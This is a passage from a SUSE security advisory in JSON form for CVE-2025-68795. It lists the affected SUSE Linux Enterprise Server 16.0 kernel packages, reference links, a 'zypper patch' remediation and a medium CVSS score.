"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68795",
"url": "https://www.suse.com/security/cve/CVE-2025-68795"
},
{
"category": "external",
"summary": "SUSE Bug 1256688 for CVE-2025-68795",
"url": "https://bugzilla.suse.com/1256688"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
